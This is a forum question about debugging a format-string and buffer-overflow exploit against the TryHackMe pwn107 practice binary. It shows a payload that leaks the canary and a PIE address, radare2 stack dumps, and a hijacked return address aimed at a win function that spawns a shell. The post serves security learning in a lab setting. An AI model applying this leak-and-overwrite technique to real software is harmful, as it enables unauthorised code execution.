Debugging a buffer overflow using ret2get_address()

Question

I am trying to exploit a buffer overflow from TryHackMe > PWN101 > pwn107.

The exploit uses a format string vulnerability to leak both the canary and a dynamic address so that we can calculate the address to get_address() aka. our win function (which contains /bin/sh), and hijack the return address. We must also overwrite the canary with itself.

I am writing my exploit in python, using pwntools and debugging using radare2.

The file has PIE, NX and a canary.

I have successfully leaked the canary and the dynamic address of main. (Well I really think it's main because it displays in radare2 as: 0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'

I can successfully overwrite the canary as I do not receive a "stack-smashing" error.

By sending a format string of "%13$lx.%17$lx", our stack looks like this:

[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125   %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731   17$lx...
0x7ffd3045a8e0 0x0000000000000002   ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff   ........ 260832255
0x7ffd3045a8f0 0x00007ffd3045ad29   ).E0.... [stack] stack R W 0x34365f363878 x86_64
0x7ffd3045a8f8 0x0000000000000064   d....... 100 ascii ('d')
0x7ffd3045a900 0x0000000000001000   ........ 4096
0x7ffd3045a908 0xd0f326fd5de89c00   ...].&..
0x7ffd3045a910 0x0000000000000001   ........ @ rbp 1
0x7ffd3045a918 0x00007f5b1f029d90   ....[... /usr/lib/x86_64-linux-gnu/libc.so.6 library R X 'mov edi, eax' 'libc.so.6'
0x7ffd3045a920 ..[ null bytes ]..   00000000 
0x7ffd3045a928 0x0000560418400992   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a930 0x000000013045aa10   ..E0.... 5104839184
0x7ffd3045a938 0x00007ffd3045aa28   (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a940 ..[ null bytes ]..   00000000 
0x7ffd3045a948 0x30f586575c89a646   F..\W..0
0x7ffd3045a950 0x00007ffd3045aa28   (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a958 0x0000560418400992   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a960 ..[ null bytes ]..   00000000 
*** deleted irrelevant lines***

Our canary is at: 0x7ffd3045a908 return address at: 0x7ffd3045a918 the address of main() that we will leak to bypass PIE is at: 0x7ffd3045a928

Then after successfully leaking the canary and address of main(), our stack looks like this:

[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125   %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731   17$lx...
0x7ffd3045a8e0 0x0000000000000002   ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff   ........ 260832255
0x7ffd3045a8f0 0x4141414141414141   AAAAAAAA @ rsi ascii ('A')
0x7ffd3045a8f8 0x4141414141414141   AAAAAAAA ascii ('A')
0x7ffd3045a900 0x4141414141414141   AAAAAAAA ascii ('A')
0x7ffd3045a908 0xd0f326fd5de89c00   ...].&..
0x7ffd3045a910 0x4242424242424242   BBBBBBBB @ rbp ascii ('B')
0x7ffd3045a918 0x00000000000006fe   ........ 1790
0x7ffd3045a920 0x000056041840094c   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text get_streak sym.get_streak program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a928 0x000056041840090a   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text sym.setup program R X 'add eax, 0xfffe10e8' 'pwn107.pwn107'
*** deleted irrelevant lines***

As you can see, the canary was properly overwritten, rbp overwritten, a ret gadget (for stack alignment) and then we properly hijacked the return address. So why isnt a shell being popped?